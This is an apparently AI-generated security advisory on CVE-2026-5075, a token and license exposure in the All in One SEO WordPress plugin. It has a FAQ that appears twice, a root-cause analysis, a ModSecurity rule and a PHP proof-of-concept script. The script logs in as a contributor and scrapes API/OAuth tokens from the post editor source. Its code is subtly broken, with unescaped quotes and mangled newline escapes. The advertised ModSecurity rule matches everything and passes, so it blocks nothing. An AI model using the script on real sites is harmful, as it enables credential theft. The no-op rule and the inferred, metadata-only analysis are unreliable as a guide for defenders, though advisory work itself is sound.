What is CVE-2026-5075?

CVE-2026-5075 is a security vulnerability in the All in One SEO plugin for WordPress, affecting versions up to and including 4.9.7. It allows authenticated users with contributor-level access or higher to view sensitive information, such as API tokens and license values, through improperly exposed localized script data.

How does this vulnerability work?

The vulnerability arises from the use of wp_localize_script() to pass sensitive internal options to JavaScript without proper masking. Authenticated users can access the post editor and view the page source, where these sensitive values are exposed in a JavaScript object.

Who is affected by this vulnerability?

Any WordPress site using the All in One SEO plugin version 4.9.7 or earlier is potentially affected. Specifically, users with contributor-level access or higher can exploit this vulnerability to access sensitive data.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the All in One SEO plugin in use. If it is version 4.9.7 or earlier, and you have users with contributor-level access, your site is at risk.

What is the severity level of this vulnerability?

CVE-2026-5075 has a CVSS score of 4.3, categorized as Medium severity. This indicates a moderate risk level, suggesting that while the vulnerability is not critical, it can still lead to unauthorized access to sensitive information.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the All in One SEO plugin to the latest version provided by the developers. Additionally, implement proper filtering of sensitive options before passing them to wp_localize_script() to prevent exposure.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider restricting contributor-level user access, or reviewing and limiting the sensitive information that is exposed through localized scripts in the plugin settings.

What are the practical risks associated with this vulnerability?

The primary risk involves unauthorized access to API and OAuth tokens, which could allow attackers to manipulate third-party services linked to the plugin. This could lead to data theft or unauthorized actions on connected accounts.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated contributor can exploit the vulnerability by logging into the WordPress admin area and accessing the post editor. By viewing the page source, the attacker can extract sensitive tokens exposed in the localized script data.

Is there a specific code change needed to fix this vulnerability?

Yes, the plugin code should be modified to filter the internalOptions data before it is passed to wp_localize_script(). Only non-sensitive options necessary for frontend functionality should be included, and sensitive data should be excluded for users without administrator privileges.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, regularly check security advisories from trusted sources, subscribe to security mailing lists, and follow best practices for WordPress security, including regular updates and vulnerability assessments.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all passwords for user accounts, especially those with administrative privileges. Review the site’s logs for unauthorized access, and consider restoring from a clean backup if necessary.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-5075: All in One SEO <= 4.9.7 – Authenticated (Contributor+) Sensitive Information Exposure via 'internalOptions' Localized Script Data (all-in-one-seo-pack)

CVE ID CVE-2026-5075

Plugin all-in-one-seo-pack

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 4.9.7

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5075 (metadata-based): This vulnerability affects the All in One SEO plugin for WordPress versions up to and including 4.9.7. It exposes sensitive internal plugin options, including API/OAuth tokens and license values, through JavaScript localization data. The attack requires contributor-level authentication and achieves a CVSS score of 4.3 (Medium) due to low confidentiality impact.

The root cause is the plugin’s use of wp_localize_script() to pass internalOptions data to JavaScript in post editor contexts without proper masking for low-privilege users. The CWE-200 classification indicates this is an information exposure vulnerability. Based on the description, the plugin likely exports an object containing all internal configuration options, including sensitive tokens, rather than filtering these before localization. This is inferred from the metadata as no code diff is available.

An authenticated attacker with contributor access can exploit this by viewing the page source of any post editor page. The vulnerable data is output as a JavaScript object, typically in a tag within the HTML head or footer. The attacker simply needs to navigate to the post editor (e.g., /wp-admin/post.php?post=1&action=edit) and view the page source to find the localized script data containing the exposed token values.

Remediation requires filtering the internalOptions data before passing it to wp_localize_script(). The plugin should whitelist only non-sensitive options that are necessary for the frontend JavaScript to function. All token, license, and sensitive configuration values must be excluded for users without administrator privileges. Atomic Edge analysis recommends using a capability check before outputting any sensitive option values.

The primary impact is unauthorized access to API and OAuth tokens configured in the plugin. With these tokens, an attacker could potentially access third-party services like Google Search Console, social media APIs, or other integrated services configured through the plugin. This could lead to data theft, service manipulation, or further lateral movement within connected accounts.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-5075 (metadata-based)
SecRule REQUEST_URI "@unconditionalMatch" "id:20265075,phase:2,pass,nolog,skipAfter:END"
SecMarker END

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5075 - All in One SEO <= 4.9.7 - Authenticated (Contributor+) Sensitive Information Exposure via 'internalOptions' Localized Script Data

// This PoC demonstrates how a contributor-level attacker can extract exposed API tokens
// from the page source of a WordPress post editor.
// The vulnerability is inferred from CWE and description; no code diff is available.

// Configuration
$target_url = 'http://localhost/wordpress'; // Change this to your target WordPress URL
$username = 'contributor_user'; // Change to a contributor-level username
$password = 'user_password'; // Change to the user's password

// Step 1: Authenticate as contributor
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log%20In&redirect_to=' . urlencode($target_url . '/wp-admin/'));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);

// Step 2: Access post editor to fetch the page containing localized script data
// This simulates an attacker viewing the source of any post edit page
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php?post_type=post');
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
$editor_page = curl_exec($ch);
curl_close($ch);

// Step 3: Extract the localized script data containing internal options
// The target script block typically looks like:
// <script id='aioseo-js-extra'>
// var aioseo = {"internalOptions":{...}};
// </script>

preg_match('/<script[^>]*id=["']aioseo-js-extra["'][^>]*>.*?({.*?internalOptions.*?}).*?</script>/s', $editor_page, $matches);

if (isset($matches[1])) {
    $localized_data = json_decode($matches[1], true);
    if (isset($localized_data['internalOptions'])) {
        echo "[+] Exposed internal options found!n";
        print_r($localized_data['internalOptions']);
        
        // Check for specific sensitive data
        if (isset($localized_data['internalOptions']['license'])) {
            echo "n[!] License information exposed!n";
        }
        if (isset($localized_data['internalOptions']['tokens'])) {
            echo "n[!] API/OAuth tokens exposed!n";
        }
    } else {
        echo "[-] No internalOptions found in localized data. Vulnerability may be patched.n";
    }
} else {
    echo "[-] Could not find aioseo localized script data.n";
    echo "[*] The script may use a different ID or the vulnerability may not be present.n";
}

// Clean up
unlink('/tmp/cve_cookies.txt');

Frequently Asked Questions

What is CVE-2026-5075?
Overview of the vulnerability
CVE-2026-5075 is a security vulnerability in the All in One SEO plugin for WordPress, affecting versions up to and including 4.9.7. It allows authenticated users with contributor-level access or higher to view sensitive information, such as API tokens and license values, through improperly exposed localized script data.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the use of wp_localize_script() to pass sensitive internal options to JavaScript without proper masking. Authenticated users can access the post editor and view the page source, where these sensitive values are exposed in a JavaScript object.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the All in One SEO plugin version 4.9.7 or earlier is potentially affected. Specifically, users with contributor-level access or higher can exploit this vulnerability to access sensitive data.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To check if your site is vulnerable, verify the version of the All in One SEO plugin in use. If it is version 4.9.7 or earlier, and you have users with contributor-level access, your site is at risk.
What is the severity level of this vulnerability?
Understanding risk assessment
CVE-2026-5075 has a CVSS score of 4.3, categorized as Medium severity. This indicates a moderate risk level, suggesting that while the vulnerability is not critical, it can still lead to unauthorized access to sensitive information.
How can I fix or mitigate this issue?
Recommended remediation steps
To mitigate this vulnerability, update the All in One SEO plugin to the latest version provided by the developers. Additionally, implement proper filtering of sensitive options before passing them to wp_localize_script() to prevent exposure.
What should I do if I cannot update the plugin immediately?
Temporary measures to reduce risk
If an immediate update is not possible, consider restricting contributor-level user access, or reviewing and limiting the sensitive information that is exposed through localized scripts in the plugin settings.
What are the practical risks associated with this vulnerability?
Potential impacts on security
The primary risk involves unauthorized access to API and OAuth tokens, which could allow attackers to manipulate third-party services linked to the plugin. This could lead to data theft or unauthorized actions on connected accounts.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept illustrates how an authenticated contributor can exploit the vulnerability by logging into the WordPress admin area and accessing the post editor. By viewing the page source, the attacker can extract sensitive tokens exposed in the localized script data.
Is there a specific code change needed to fix this vulnerability?
Technical remediation details
Yes, the plugin code should be modified to filter the internalOptions data before it is passed to wp_localize_script(). Only non-sensitive options necessary for frontend functionality should be included, and sensitive data should be excluded for users without administrator privileges.
How can I stay informed about future vulnerabilities?
Best practices for security awareness
To stay informed about future vulnerabilities, regularly check security advisories from trusted sources, subscribe to security mailing lists, and follow best practices for WordPress security, including regular updates and vulnerability assessments.
What should I do if I suspect my site has been compromised?
Response actions for security incidents
If you suspect your site has been compromised, immediately change all passwords for user accounts, especially those with administrative privileges. Review the site’s logs for unauthorized access, and consider restoring from a clean backup if necessary.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations